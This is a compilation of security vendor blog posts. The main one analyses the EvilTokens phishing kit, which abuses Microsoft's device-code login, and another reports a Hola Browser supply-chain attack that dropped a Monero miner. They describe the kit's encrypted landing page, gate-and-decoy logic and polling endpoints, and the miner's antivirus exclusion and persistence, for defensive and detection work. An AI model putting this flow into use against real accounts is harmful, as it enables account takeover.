EvilTokens: How “Ghost” Code Threatens US and European Businesses

EvilTokens can hide serious account takeover risk from your SOC through “ghost” code that appears only after browser-side decryption. 

As a result, static URL analysis may miss the most important part of the attack, leaving teams with incomplete evidence, slower triage, and longer exposure to a potential Microsoft 365 compromise. 

Full browser-level inspection closes this gap by revealing how the page behaves after execution in a dynamic environment. This gives teams the evidence they need to validate the threat and respond faster. 

Key Takeaways 

  • EvilTokens hides key parts of its phishing flow behind browser-side decryption, creating a visibility gap for static URL analysis. 
  • The kit abuses Microsoft’s legitimate device login flow to gain account access without directly stealing the victim’s password. 
  • Browser-level evidence helps SOC teams reduce manual checks, avoid unnecessary escalations, and make faster containment decisions. 
  • Threat Intelligence pivots connect one EvilTokens session to related phishing kits, infrastructure, indicators, and wider device-code phishing activity
  • Decrypted code and behavioral patterns can also support stronger phishing signatures, threat hunting, and custom detection rules. 

EvilTokens Targeting: Regions and Industries at Risk 

According to ANY.RUN Threat Intelligence data, recent EvilTokens activity is concentrated mainly in the United States and Europe. 

View recent EvilTokens activity in ANY.RUN Threat Intelligence 

EvilTokens targeting specific industries

The kit has been observed targeting organizations in: 

  • Managed security services 
  • Technology 
  • Manufacturing 
  • Education
  • Banking
  • Consulting and financial services 

These findings show that EvilTokens is aimed largely at organizations where access to a single Microsoft 365 account can expose sensitive data, internal communications, and connected business services. 

Why EvilTokens Creates a Blind Spot for SOC Teams 

EvilTokens continues to rank among the most frequently observed phishing kits in ANY.RUN’s weekly threat reports. 

A recent analysis session showed how the kit uses Microsoft Device Code Phishing to compromise accounts without stealing credentials directly. Instead, it convinces the victim to complete Microsoft’s legitimate device login flow and unknowingly authorize access to their account. 

Check analysis session with recent EvilTokens attack 

Recent EvilTokens attack analyzed inside ANY.RUN sandbox 
Recent EvilTokens attack analyzed inside ANY.RUN sandbox

What makes the attack difficult to investigate is the way it hides its phishing content. The landing page HTML is encrypted with AES-GCM and becomes visible only after the browser decrypts it and renders it in the DOM. 

Static URL checks and network-level detection may therefore capture the initial response without showing what the victim actually sees in the browser. This can leave SOC teams with an incomplete verdict, force additional manual checks, trigger unnecessary escalations, and delay containment.

This visibility gap becomes a business risk. When SOC teams cannot see what a suspicious page does after browser execution, the impact goes beyond a slower investigation. It can lead to: 

  • Longer exposure to potential Microsoft 365 account takeover 
  • Delayed containment and response decisions 
  • More alerts escalated to senior security staff 
  • Higher investigation workload and operational costs 
  • Incomplete evidence for blocking related infrastructure 
  • Greater risk of unauthorized access to corporate data and services 

To validate the threat quickly, teams need visibility into what happens after the page begins running. In the following walkthrough, we use ANY.RUN’s in-browser data inspection to uncover the decrypted page, trace the requests behind the device-code flow, and collect evidence for response and further detection. 

Uncover phishing activity hidden inside the browser.  

Give your SOC the evidence to validate and respond faster.



Contact us


With in-browser data inspection inside ANY.RUN’s Interactive Sandbox, investigators can examine cases like this across several layers:

HTML DOM Changes: Tracks changes to the DOM over time and allows investigators to compare different snapshots of the same page. It highlights byte-level differences from the previous DOM state, making it easier to identify the exact moment when the decrypted phishing page appears. 

HTTP Requests: Provides visibility into browser-level network activity, including requests involving HTML, JavaScript, Fetch/XHR, scripts, static assets, binary files, archives, and other request categories. 

URL Details: Displays the final URL and domain, SSL certificate information, DNS A records, request statistics, and triggered detection signatures. 

Indicators: Collects indicators of compromise associated with the page, including top-level domains, subdomains, URL endpoints, file hashes, IP addresses, and ASN information. 

Triage Walkthrough Using Browser Data 

The network traffic shows that EvilTokens delivers the landing page in an HTTP response encrypted with AES-GCM: 

EvilTokens HTTP response body containing the AES-GCM-encrypted landing page

The decrypted HTML DOM of the page can be viewed in the Browser Data panel: 

In-browser data investigation panel inside the interactive sandbox 

Here, you can view snapshots of the DOM structure after the AES-GCM-encrypted code has been decrypted:

DOM snapshots displayed with decrypted code
DOM snapshots displayed with decrypted code 

The HTML DOM Changes fields contain the following information: 

  • Timeshift: The time elapsed from the start of the analysis when the DOM snapshot was captured. 
  • Score: The risk level assigned to that particular state of the page. As shown in the screenshot, the score is 100, which corresponds to the signatures triggered by that DOM state. 
  • Size diff: The change in DOM size compared with the previous snapshot. 
  • Size: The size of the current DOM snapshot. 
  • Page: The domain associated with the snapshot. 

The value that should draw your attention most is the green +48-byte size diff. By selecting the fourth snapshot, you can see which line was removed and which line was added compared with the previous snapshot: 

Check line changes to see the codes added and removed 

Looking at the Render panel on the left, we can confirm that a user code has appeared on the page. The attackers will later use this code to take over the victim’s Microsoft 365 account: 

Render of the page

This suggests that the landing page dynamically requested the user code from the backend through a Fetch/XHR request. The request can be examined in the HTTP Requests tab: 

HTTP Requests panel inside the Browser Data  

By comparing the Timeshift values of the HTTP request and the DOM snapshot, we can conclude that the user code was obtained through a request to the /api/device/start endpoint. Clicking the URL confirms this:

HTTP response from EvilTokens

Pivoting from One EvilTokens Session to Broader Threat Activity

The findings from a single analysis session can be used to uncover related phishing infrastructure and activity.

Start with URL Details, where the code exposed in the DOM triggered the Microsoft OAuth device-code phishing signature.  

URL details displayed inside ANY.RUN sandbox 

Searching for this signature in ANY.RUN’s Threat Intelligence reveals other phishing resources that use similar code patterns:  

TI Query: ruleName:”^Microsoft OAuth device-code phishing has been detected$”

Search for analysis sessions that triggered the “Microsoft OAuth device-code phishing has been detected” signature

The results show that this behavior is not unique to EvilTokens. Other phishing kits use similar code and techniques, allowing teams to move beyond one isolated case and identify a broader set of related threats.

Expand one investigation into broader threat context.
 

Strengthen detection and stop related attacks before they spread.



Improve threat detection


 To narrow the search specifically to EvilTokens, use the following query: threatName:”eviltokens” 

Threat Intelligence data shows that recent EvilTokens activity is concentrated mainly in the United States and Europe: 

Threat activity targeting specific regions

Teams can also track device code phishing activity more broadly using the oauth-ms-phish threat tag:  

TI Query: threatName:”oauth-ms-phish” 

Indicators displayed for broader analysis

This wider search helps teams identify related campaigns even when they are associated with a different phishing kit or infrastructure.

Next, return to Browser Data and open the Indicators tab: 

Not every artifact collected during the analysis should be added to detection rules. For example, the observed IP address belongs to the CloudflareNet autonomous system. Blocking or detecting this shared infrastructure could produce false positives and affect legitimate services. 

More specific indicators from the session, including the domain, URI, and hash, are stronger candidates for further validation and detection: 

TI Query: url:”/api/device/start” or  domainName:”emp01825.workers.dev$” or md5:”fcd1b654a0b3e8f85ca7cfdafe494d4b” 

ANY.RUN Threat Intelligence query using indicators extracted from in-browser data 

By pivoting on signatures, threat names, tags, and carefully selected IOCs, teams can connect an individual alert to wider phishing activity, improve detection coverage, and respond proactively to related attacks. 

Breaking Down the EvilTokens Attack Logic 

The HTML DOM Changes view is useful not only for triage but also for deeper code analysis. By examining the decrypted page logic, teams can identify recurring patterns that may support low-level phishing detection rules. 

The following code shows the Device Code Flow Configuration

Device code flow configuration

Gate Check and Decoy Delivery 

The first fragment shows the client sending a gate check request to: 

/api/device/gate/<PAGE_ID> 

The backend returns a killed flag that determines what happens next. If the phishing flow remains active, the attack continues. Otherwise, the victim is shown a decoy page designed to resemble a Microsoft error or expired-link message. 

EvilTokens gate check logic 

This mechanism allows operators to disable the phishing page or hide its true behavior when certain visitors or conditions are detected. 

Requesting and Displaying the User Code 

The next fragment sends a POST request to _startUrl: 

/api/device/start 

The backend returns the userCode, sessionId, and verification URI. The script then stores the session, constructs _verificationUrl, and writes the user code into the DOM for the victim. 

Code used to request the user code

This is the same activity observed earlier in the HTTP Requests view, connecting the browser-side code directly to the network request and the user code displayed on the page. 

Monitoring the Device-Code Session 

The frontend then checks the status of the device-code session through: 

/api/device/status/{sessionId} 

It repeatedly sends GET requests containing the current sessionId and receives the latest status from the backend. 

Once the status changes to completed, the script stops polling, displays a success screen, and redirects the victim to the legitimate OneDrive website. 

Authorization status polling

This final redirect helps the attack appear successful and legitimate, while the attackers retain the access authorized through the completed Microsoft device login flow. 

By connecting the decrypted DOM code with browser requests and visible page changes, teams can reconstruct the full phishing logic and identify code patterns, endpoints, and behaviors that may strengthen future detection. 

Turning Hidden Browser Activity into Faster SOC Decisions 

The EvilTokens investigation shows the practical value of browser-level evidence. Instead of stopping at the encrypted HTTP response, teams can see the decrypted DOM, identify the request that generated the user code, trace the device-code session, and extract artifacts for detection and threat hunting. 

Benefits of browser-level evidence

This improves the investigation workflow in several ways: 

Faster triage and fewer unnecessary escalations: Tier 1 analysts can validate suspicious URLs using direct browser-level evidence rather than relying on incomplete indicators. This reduces uncertainty, speeds up verdicts, and keeps more benign cases from reaching senior teams.

Smoother handoff and faster response: When escalation is necessary, Tier 2 receives the full attack context, including DOM changes, HTTP requests, triggered signatures, rendered content, and relevant indicators. This reduces repeated work and supports faster containment decisions. 

Stronger detection engineering: Decrypted page code, browser requests, endpoints, and behavioral patterns provide useful material for custom phishing signatures, hunting hypotheses, and detection rules based on observed attacker behavior. 

More focused threat hunting: Teams can pivot from one EvilTokens session to related domains, code patterns, phishing kits, and device-code attacks in ANY.RUN’s Threat Intelligence, expanding the investigation beyond a single URL. 

Clearer reporting: Structured investigation results turn complex browser activity into evidence that is easier to use during triage, escalation, incident response, and stakeholder communication.

For SOC and MSSP teams, this means less time spent reconstructing browser activity manually, better use of senior resources, and a faster path from a suspicious URL to a confident response decision. 

Turn hidden browser activity into clear response evidence.
 

Reduce investigation delays and help your SOC act faster.



Accelerate response now


About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps SOC teams, MSSPs, and enterprises investigate threats faster and make more confident security decisions. 

Its cloud-based Interactive Sandbox lets teams safely analyze suspicious files, URLs, and emails in real time, observe malicious behavior as it unfolds, and collect clear evidence for faster response. 

ANY.RUN’s Threat Intelligence solutions add broader context around threats, infrastructure, and attacker activity. Together, these capabilities support faster triage, stronger detection, better-informed response decisions, and more efficient security operations at scale. 

The post EvilTokens: How “Ghost” Code Threatens US and European Businesses appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

How Hola Browser was weaponized to spread a Monero miner | Kaspersky official blog

In early June, cybersecurity researchers discovered that a compromised version of the Israel-based Hola Browser for Windows (version 1.251.91.0) was secretly downloading a Monero crypto miner to users’ devices. Shortly after the discovery, Hola confirmed that it had fallen victim to a supply chain attack. In this article, we break down how the attack went down, how the crypto miner works, and what it means for affected users.

What is Hola Browser, and how was the malware discovered?

The Israeli company Hola is best known for its VPN service, which users primarily rely on to bypass geo-restrictions and access region-locked content. In addition to the VPN, the company develops Hola Browser — a Chromium-based browser that comes with built-in VPN and proxy features.

Researchers first spotted signs of trouble during a standard compliance check for the AppEsteem Windows Certified Application program. As part of this certification process, independent cybersecurity firms audit software to ensure it only contains the components it claims to have and is free of unwanted or malicious features. Even after a certificate is granted, apps are regularly re-evaluated to ensure they continue to meet AppEsteem’s strict guidelines.

It was during one of these routine follow-up checks that experts noticed an unauthorized file bundling itself with version 1.251.91.0 of Hola Browser for Windows. Once installed, the file saved itself to the hard drive at C:Program FilesHolame{.}exe. The file immediately raised red flags for researchers due to a laundry list of suspicious characteristics: it wasn’t on the list of approved application files, lacked a timestamp, and had no digital signature. On top of that, its code was heavily obfuscated, and it possessed the ability to inject itself directly into system memory.

Interestingly, researchers noted that the file didn’t show up in every single installation. Because the infection wasn’t widespread across all users, experts suspected early on that a specific stage in the Hola Browser distribution pipeline had been compromised. Hola later confirmed this theory, admitting it had fallen victim to a supply chain attack.

As for the suspicious me{.}exe file itself, closer analysis revealed that it was a stealthy crypto miner configured to mine Monero. We’ll now dive into the technical details of how it works.

How did attackers use Hola Browser to mine Monero?

Crypto miners are programs that harness a computer’s processing power to mine cryptocurrency. While some users install this software intentionally to generate a bit of income, miners that run on a machine without the owner’s knowledge are typically classified as unwanted.

Running a hidden miner can noticeably slow down the device, spike the user’s electricity bill, and shorten the hardware’s lifespan. That being said, it’s worth noting that a crypto miner infection will not actually steal the owner’s cryptocurrency; the damage is strictly limited to the hijackers leeching your computer’s hardware resources to line their own pockets.

As we mentioned above, the malicious download bundled with Hola Browser sneaked a Monero crypto miner onto victims’ devices. Launched in 2014 and built on the CryptoNote protocol, Monero currently trades at around US$330 per coin.

Compared to heavyweights like Bitcoin or Ethereum, Monero is a bit exotic and lesser-known to the general public. This niche status shows in its relatively modest price growth and smaller market capitalization — which is roughly 200 times lower than Bitcoin’s. However, Monero has one defining feature: privacy. While Bitcoin and Ethereum operate on fully transparent, public blockchains, where anyone can trace transactions, Monero is a “privacy coin”. It uses advanced cryptographic mechanisms to mask the sender, receiver, and transaction amounts. This extreme anonymity is exactly why hackers love hidden Monero miners — it makes it difficult for law enforcement and cybersecurity professionals to follow the money trail.

Additionally, Monero’s underlying algorithm is explicitly designed to mine efficiently using standard computer processors (CPUs). This stands in stark contrast to many other popular cryptocurrencies, which require specialized ASIC hardware or high-end graphics cards (GPUs) to be profitable.

But let’s look closer at how this played out with Hola Browser. When researchers dissected the malicious me{.}exe code, they found it was automatically adding its own files to the Microsoft Defender exclusion list. By allowlisting itself, the malware successfully blinded Windows’ built-in antivirus, allowing the crypto miner to run in the background completely unhindered.

Once inside, the program made a copy of itself under the name HolaMonitorService{.}exe, and set up a persistent Windows background service called hola_monitor_svc. This maneuver allowed the malware to entrench itself in the system, automatically launching every time the computer restarted. To avoid raising any red flags with sudden massive performance drops, the miner was programmed to stay dormant, kicking into gear only when the computer was idle.

How to protect your device from crypto miners and malware

To their credit, Hola’s development team responded swiftly to the initial reports of the suspicious file. They confirmed the supply chain breach, but stated that the incident only impacted 0.1% of their user base. The company has since tightened up security around its update distribution pipeline to guarantee that users only receive approved, certified, and digitally-signed software components moving forward.

In light of this incident, we highly recommend that all Hola Browser users update to the latest version immediately — especially those running the application on Windows.

More broadly, this situation is a textbook reminder of why it’s so critical to keep all your software up to date and run a robust cybersecurity solution on all your gadgets. For instance, Kaspersky Premium provides real-time alerts about suspicious software behavior and blocks threats instantly. As an added bonus, a Kaspersky Premium subscription includes a secure and reliable VPN.

Don’t forget that malicious crypto miners don’t just target PCs; they also go after smartphones, often disguising themselves as anything from popular mobile games to official government service apps. Check out our previous posts to learn more:

Kaspersky official blog – ​Read More

The Hacker News Recognizes ANY.RUN as the Best Security Investigation Platform 2026 

ANY.RUN has been recognized as the Best Security Investigation Platform 2026 at the Cybersecurity Stars Awards by The Hacker News. 

This award reflects our dedication to building solutions that make a real impact on daily security operations. 

At ANY.RUN, we help SOC and MSSP teams worldwide streamline threat investigation workflows through confident decision-making, full malware and phishing visibility, and actionable insights thataccelerate incident investigations and response. 

We thank our global community of security professionals for continuously trusting our solutions and supporting our growth! 

Reinforcing Our Position as a Market Leader 

The Cybersecurity Stars Awards are organized by The Hacker News, one of the industry’s leading cybersecurity publications, delivering industry news, threat intelligence insights, and practical security guidance to more than 50 million security professionals annually. 

The award recognizes companies and individuals who have demonstrated excellence in cybersecurity through innovation, impact, and technical achievement. 

As the organizers noted: 

“[ANY.RUN’s] work helps SOC and MSSP teams move faster in the critical moments when every second counts in threat investigation.” 

This recognition reflects our mission to simplify complex investigations and help security teams in companies and organizations accelerate detection, analysis, and response at scale. 

Delivering Innovation for Measurable Impact 

boost soc performance
Insights from ANY.RUN users on their improved metrics

Winners were selected by an independent panel of cybersecurity experts based on criteria including innovation, industry impact, and technical excellence. At ANY.RUN, we translate these principles into tangible business outcomes for security teams: 

  • Greater operational efficiency with automated enrichment and streamlined investigation processes. 
  • Confident incident response backed by actionable intelligence from investigations by 15,000+ security teams. 

Looking to boost your SOC’s efficiency? 

Build fast, consistent security operations with ANY.RUN.



Contact us


Recent Releases Driving SOC Investigations Forward 

ANY.RUN’s enterprise-ready solutions are designed to meet the needs of modern SOC and MSSP environments. Our recent releases reinforce this mission by delivering: 

  • Fast, evidence-based decision-making through in-browser data inspection, enabling analysts to perform URL analysis without switching between multiple tools or workflows. 
  • Consistent and efficient investigations with SOC-ready reporting that converts analysis outputs into structured, operationally ready documents. 

About ANY.RUN 

ANY.RUN provides cybersecurity solutions for SOC and MSSP teams that enable stronger operations across threat investigation workflows.  

Interactive Sandbox for enterprise-scale malware and phishing analysis and ANY.RUN Threat Intelligence solutions aggregate investigation data from more than 15,000 SOCs worldwide to support instant enrichment and early threat detection.   

The company’s mission is to deliver fast threat understanding and confident incident response.  

ANY.RUN is SOC 2 Type II attested and committed to strong security control and customer data protection. 

The post The Hacker News Recognizes ANY.RUN as the Best Security Investigation Platform 2026  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Killing me gently: Inside Gentlemen’s EDR killer framework

ESET Research shares the results of a months-long investigation into the suite of EDR killers maintained by the RaaS gang Gentlemen

WeLiveSecurity – ​Read More

World Cup 2026: watch out for these scams | Kaspersky official blog

The World Cup attracts a great many fans — but also a great many scammers. While millions of fans tune in to watch the matches, cybercriminals are hard at work trying to get at their money and personal data. In fact, we’ve already flagged more than 336 fake websites designed to look exactly like the official World Cup page! As the biggest sporting event of the year heats up, here are the top red flags you need to watch out for.

Totally Legit Free Streams (No Scam)

Scoring a seat at WC26 has turned into quite the mission. Soccer fans are furious over ticket prices, which have officially been dubbed the highest in World Cup history. On top of lodging and travel costs, the situation is made even worse by America’s stringent immigration policies — where referees, team staff, and even players have faced major visa and entry headaches. But fans still want to watch the games, and that’s exactly where fake streaming platforms step in to “help”.

Here’s how the scam plays out: cybercriminals set up fake websites promising free access to World Cup match streams. But the moment you click Watch Now, you’re prompted to sign up and then pay for “lifetime access” to the entire tournament. In the example below, they’re asking for cryptocurrency — which is still a bit unusual, since scammers typically prefer good old-fashioned bank cards.

An example of a fake video streaming website requiring users to register and pay with cryptocurrency to watch all World Cup 2026 matches

An example of a fake video streaming website requiring users to register and pay with cryptocurrency to watch all World Cup 2026 matches

Fans who are desperate to catch their favorite teams live risk losing not just their money, but also their personal data, which hackers can later weaponize in targeted phishing attacks.

A losing bet

Match result predictions and sports betting always skyrocket in popularity during the World Cup, and scammers waste no time cashing in on the trend. And behind the flashy slogans lie classic scam tactics.

Take this beautifully designed Spanish-language website. To sign up, it demands a massive amount of personal information, including your full name, national ID number, email address, and phone number — and, of course, it asks you to create a password. If a victim uses the exact same password for multiple accounts, they’re essentially handing the keys to their digital life over to cybercriminals.

To guess match outcomes on this site, you have to hand over way too much personal info — everything short of biometrics

To guess match outcomes on this site, you have to hand over way too much personal info — everything short of biometrics

Another site, specifically targeting users in Colombia, turned the sign-up process into a paid ordeal — and it features every trick in the book.

  • To “verify” your profile, you’re forced to use WhatsApp under the guise of avoiding legal complications.
  • Before your account is activated, you must make a deposit. This means sending 100 000 Colombian pesos (about $29) to a specified account and texting the receipt to an “administrator” on WhatsApp.
  • Next, you’re told to wait 12 hours for the “administrator” to manually activate your profile.
  • Only after all of this do the scammers tell you can place unlimited bets (of course not true).
These scammers built a whole website, but they do all their business over WhatsApp. That's a red flag!

These scammers built a whole website, but they do all their business over WhatsApp. That’s a red flag!

In many countries — including Colombia — sports betting is strictly regulated. Only a handful of licensed operators are legally allowed to run these sites, and users are required by law to verify their identity. Because of this, these shady workarounds can look tempting to people who love to gamble but don’t want to — or can’t — go through the official verification process.

Unfortunately, the scammers always win in this scenario. They walk away with your initial deposit and every single bet you place on their site. At the end of the day, their only real goal is to drain their victims’ wallets for as much as they possibly can.

Discounts for collectors!

The World Cup isn’t just about the matches; it also drives record-breaking sales of collectible merchandise — stickers, scarves, team jerseys, official match balls, and more. Naturally, plenty of scammers are eager to get a piece of that action.

Take a look at this website offering “exclusive, limited-edition” stickers and albums. Notice anything suspicious?

Talk about a steal! Too bad the whole website is a scam

Talk about a steal! Too bad the whole website is a scam

Check out those prices: everything is heavily discounted, even though the tournament is in full swing. All it takes is a quick price check against the real deal to spot the trap. In the screenshot above, the scammers are charging 67 euros for a sticker collection. On actual online marketplaces, that exact same set goes for at least twice as much, and on the official Panini website, it’s three times the price.

Fake websites mimicking popular sporting goods stores also offer to sell you shin guards, socks, jerseys, and any other gear. Of course, you’ll never see the merchandise, and you’ll lose both your money and your bank card details.

When they've absolutely no intention of delivering any products, they can easily offer massive discounts and free shipping

When they’ve absolutely no intention of delivering any products, they can easily offer massive discounts and free shipping

Deals that seem too good to be true are one of the biggest red flags. To make matters worse, with the help of AI, fake websites now look just as professional as the real ones, making them harder than ever to spot. That’s why we recommend installing our security suite before you start shopping online. It blocks phishing sites in real time and uses the Safe Money feature to keep your financial data secure.

Soccer by mail

Another attack strategy involves spam campaigns centered around the World Cup. In one email, our experts uncovered an ad for a soccer analytics and betting-tips service. It uses the classic high-pressure playbook: “ONLY 10 SPOTS AVAILABLE” — so hurry up before they run out! Naturally, access comes with a price tag: AU$200.

Spammers hurrying the victim to make a decision as quickly as possible

Spammers hurrying the victim to make a decision as quickly as possible

This scheme targets fans who are into sports betting, and paying for these types of services usually ends one of two ways for them: they either lose their money with zero guarantee of getting actual predictions, or get sucked into an even deeper, multi-step financial trap.

How to avoid falling for the scams

Across all these scenarios, the World Cup is just another convenient pretext for cybercriminals. Once the tournament wraps up, they’ll most certainly pivot back to their usual tricks — like fake job offers or Telegram phishing scams — until the next Olympics or soccer tournament rolls around and they switch right back to sport.

Our research consistently shows that online fraud has evolved into a massive illegal enterprise. You aren’t just up against lone scammers anymore; you’re dealing with large criminal networks. When it comes to defense, the best approach is a proactive one. By installing Kaspersky Premium, you can safeguard all your devices from malware, phishing, spam, and malicious or lookalike websites. Plus, the included Kaspersky Password Manager will generate unique complex passwords, securely store your sensitive data — like documents and bank cards — and stop you from auto-filling your credentials on fake sites.

  • Watch the games only on legitimate streaming platforms. Don’t trust fake reviews and never enter your bank card information on unverified sites. Keep an eye out not just for sketchy streaming websites, but also for fake IPTV apps. As we’ve covered in detail before, scammers frequently use these to infect your devices with Trojans.
  • Shop smart. The best way to avoid getting ripped off is to buy merchandise exclusively through official channels (where you won’t see suspiciously deep discounts), or simply buy your gear in person at official retail locations.
  • Don’t click suspicious links. If a deal that’s too good to be true lands in your inbox — whether it’s exclusive betting tips or anything else — just ignore it and hit delete.
  • Avoid logging in through Telegram bots. At the very least, this saves you from future headaches and annoying spam. At best, it keeps your account from being hijacked and your crypto from being stolen.
  • Switch to passkeys wherever possible. Unlike traditional passwords, which are easily stolen and can be typed into any fake login page, a passkey is cryptographically tied to a specific website and won’t work on a phishing page. Kaspersky Password Manager can easily store and sync your passkeys across all your devices.

What other ruses do scammers use to make a quick buck? Check out our other posts:

Kaspersky official blog – ​Read More

Protecting legacy OT systems against modern cyberthreats

Many manufacturing plants depend on OT systems that stay in service for many years. That long run can hide significant cybersecurity risks.

WeLiveSecurity – ​Read More

FishMonger’s arsenal upgraded: SprySOCKS for Windows

ESET researchers have discovered SprySOCKS for Windows, FishMonger’s backdoor weaponizing a kernel driver for advanced stealthiness

WeLiveSecurity – ​Read More

The New Standard for URL Analysis: Closing Phishing Blind Spots with In-Browser Data Inspection 

Modern URL phishing relies on dynamic pages, credential harvesting flows, client-side scripts, and layered redirect chains. But most SOC workflows are still built around static analysis, making them blind to most of these tactics. 

ANY.RUN changes this forever with in-browser data inspection. 

The new technology takes URL analysis to the next level by bringing static and dynamic analysis into one single workflow. Now, every phishing URL’s behavior like script execution and redirects is visible to the analyst in real time, leaving no blind spots for attackers to exploit.  

Available to all ANY.RUN users, this new layer of URL phishing visibility provides a massive boost for the triage and response speed for SOC & MSSP teams, enabling them to see and contain critical attacks before they become incidents. 

Before vs. After: Fixing Slow and Painful URL Triage Process 

ANY.RUN delivers complete URL phishing context within seconds 

Right now, the typical URL analysis process for most SOC and MSSP teams looks like this: A suspicious URL comes in, and the analyst starts assembling context. They scan the URL to get basic info, sandbox it to see what it does, trace redirects, inspect traffic, and still have to piece everything together manually to make a decision. 

This turns every alert into a time-consuming task. Analysts spend extra time validating signals, escalate cases by default, and still risk closing malicious URLs without fully understanding their behavior.  

URL Analysis with ANY.RUN: Full Static & Dynamic URL Context within Seconds 

See all URL details, DOM changes, network requests, and IOCs in one place 

In-browser data inspection solves this friction by giving you the full static and dynamic URL context in just one click. The page executes in a real browser, and everything that matters, redirects, scripts, DOM changes, user-facing content, is captured and presented to you in a single view. No tab switching. 

The result is an instant view of the attack in one place: How the user is redirected, what scripts drive the interaction, where data is collected, and how the phishing flow is constructed end-to-end.  

The context that used to take up to an hour to collect is now delivered within seconds, complete with a verdict and ready for confident next-step decisions. 

Analyze any suspicious URL with ANY.RUN 

See how it compares to your usual analysis flow



Launch analysis


Why Existing URL Investigation Approaches Fall Short 

Many security solutions still lack the dynamic browser-level visibility needed to clearly understand how a phishing attack unfolds in real time, resulting in critical gaps: 

  • Analysts may see a screenshot of the final page, but not the full path that led to it: redirects, scripts, iframe activity, and intermediate page states 
  • Limited visibility into the forms, content, and user-facing elements the victim actually saw and interacted with 
  • Missing context around DOM changes, injected content, and dynamically loaded elements during page execution 
  • Reliance on static page analysis instead of a dynamic, step-by-step view of real browser behavior 
  • Lack of automatically collected DOM history that allows analysts to inspect page changes across different execution stages 
  • No visibility into browser activity preceding WAF alerts or application logs 

Without browser-level inspection, critical evidence can remain hidden from investigators. As a result, analysts often need to combine multiple tools and data sources to fully understand a single URL. 

The Operational Impact of Visibility Gaps for Security Teams 

These visibility gaps create several operational challenges for SOC teams: 

  • Fragmented Workflow: Reconstructing webpage behavior across multiple tools and data sources slows investigations, increases manual effort, and delays response. 
  • Inefficient Resource Management: When analysts lack sufficient evidence to classify a URL confidently, potentially benign links are often escalated to senior team members, consuming valuable resources. 
  • Phishing Analysis Gap: Solutions focused on file or network activity may miss critical phishing context, leaving analysts without sufficient browser-level evidence. 

As phishing attacks continue to rise, security teams need faster and more reliable ways to investigate suspicious URLs. In-browser data inspection closes this visibility gap by introducing a new layer of webpage-level investigation evidence. 

Beyond URL Scanning: Full Browser Visibility for Phishing Investigations 

Functionality and impact delivered by ANY.RUN surpasses what most solutions offer 

As phishing and browser-based threats continue to grow in both volume and sophistication, it’s time for SOC and MSSP teams to upgrade their operations to match the reality of modern attacks. 

Available to all ANY.RUN users, in-browser data inspection introduces an investigation layer missing from many security operations today. Unlike workflows that force analysts to piece together evidence across multiple tools, ANY.RUN provides dynamic, in-depth browser visibility, making URL investigations faster, clearer, and more reliable. 

This new investigation layer enables SOC analysts to: 

  • Instantly validate, enrich, and prioritize phishing threats using evidence that often remains hidden in conventional URL analysis workflows 
  • Reduce uncertainty during investigations with direct visibility into what happens during execution 
  • Reveal the complete attack chain, including redirects, executed scripts, iframes, and dynamically loaded content 
  • Track browser and DOM changes across every stage of page execution 
  • Gather the evidence required for fast triage, escalation, and response from a single investigation workflow 
  • Access threat intelligence required for detection engineering, hunting, and campaign analysis 

All without leaving the sandboxing interface. 

Instead of relying solely on network logs or file traces, the new inspection method allows you to see all browser activity observed on the webpage, including forms, content, DOM changes, scripts, and redirects. This provides direct access to behavioral insights and evidence that often remain unavailable in URL analysis and sandboxing workflows. 

Unlike workflows that require analysts to manually reconstruct browser activity from multiple data sources, in-browser data inspection consolidates browser telemetry, page content, behavioral evidence, and threat intelligence into a single investigation experience. 

This allows teams to move from URL analysis to confident decisions faster, with less effort and greater visibility. The result is accelerated triage, more validated escalations, stronger detections, and more efficient security operations. 

Change the Way You Investigate Phishing with In-Browser Data Inspection 

In-browser data inspection changes how phishing investigations are performed. By delivering dynamic browser visibility within ANY.RUN’s Interactive Sandbox, it helps SOC and MSSP teams investigate threats faster, reduce uncertainty, and make more confident incident response decisions. 

Instead of piecing together screenshots, redirects, page content, browser artifacts, and external intelligence from multiple tools, analysts receive a complete browser-level investigation within a single workflow. 

To start your investigationsimply open the Browser Data tab to access a complete, dynamic view of the web page execution. It’s available within every URL analysis in ANY.RUN’s Interactive Sandbox. 

View analysis 

Phishing analysis inside ANY.RUN’s Interactive Sandbox. Browser Data tab  

Understand the Attack Flow 

The Browser Data within ANY.RUN’s Interactive Sandbox provides the entire web page execution tree, from initial URL to the final page view, featuring all redirects and activated iframes. Color highlights and tags point to the pages responsible for triggering detections. 

Investigation outcome: Accelerate triage and escalation decisions by gaining an immediate overview of the dynamic attack flow and identifying the most relevant stages for further analysis. 

HTTP Requests tab within Browser Data section. ANY.RUN’s Interactive Sandbox 

Detailed HTTP Requests data provides complete visibility into redirects, requests, and responses generated during page execution.  

Investigation outcome: Improve threat validation and detection engineering by reconstructing redirect chains and collecting evidence for IDS detections and network-based hunting rules. 

Analyze Browser-Level Behavior 

URL Details displays related context and screenshots. ANY.RUN’s Interactive Sandbox 

Explore browser-level telemetry, including triggered signatures, domain, URL, and IP statistics, as well as rendered screenshots of the analyzed page. 

Investigation outcome: Improve threat validation and detection engineering by reconstructing redirect chains and collecting evidence for IDS detections and network-based hunting rules. 

To see which code fragments were added to the DOM after the page loaded, go to the HTML DOM Changes tab for deobfuscation. It will reveal what static analysis misses: 

View analysis 

The green lines show the new code which was added to the DOM after the page loaded. ANY.RUN’s Interactive Sandbox 

In-browser data inspection captures the fully rendered and interactive state of the page, allowing the analyst to see the actual behavior, including hidden forms, redirects, and user interaction logic that were impossible to understand statically. 

Investigation outcome: Strengthen threat hunting and detection engineering by identifying phishing elements, reconstructing the loading process, and extracting behavioral artifacts. 

Expand the Investigation Beyond the Initial Sample 

Track all related indicators in a dedicated tab. ANY.RUN’s Interactive Sandbox 

Collected Indicators include URLs, domains, IP addresses, and hashes of web content associated with the analyzed page. 

Investigation outcome: Expand investigations beyond a single sample by developing pivoting hypotheses and uncovering attacker-controlled infrastructure. 

Content extracted from web page snapshots can also be used to create custom hunting and detection rules backed by ANY.RUN Threat Intelligence. 

YARA rule built based on Browser Data. ANY.RUN’s TI Lookup & YARA Search 

In this example, a YARA rule created from a single phishing page identified 145 related samples within Threat Intelligence Lookup & YARA Search

YARA rule browsing results. ANY.RUN’s TI Lookup & YARA Search 

Investigation outcomes: 

  • Expand visibility beyond a single URL or alert 
  • Validate threat hunting hypotheses with browser-level evidence 
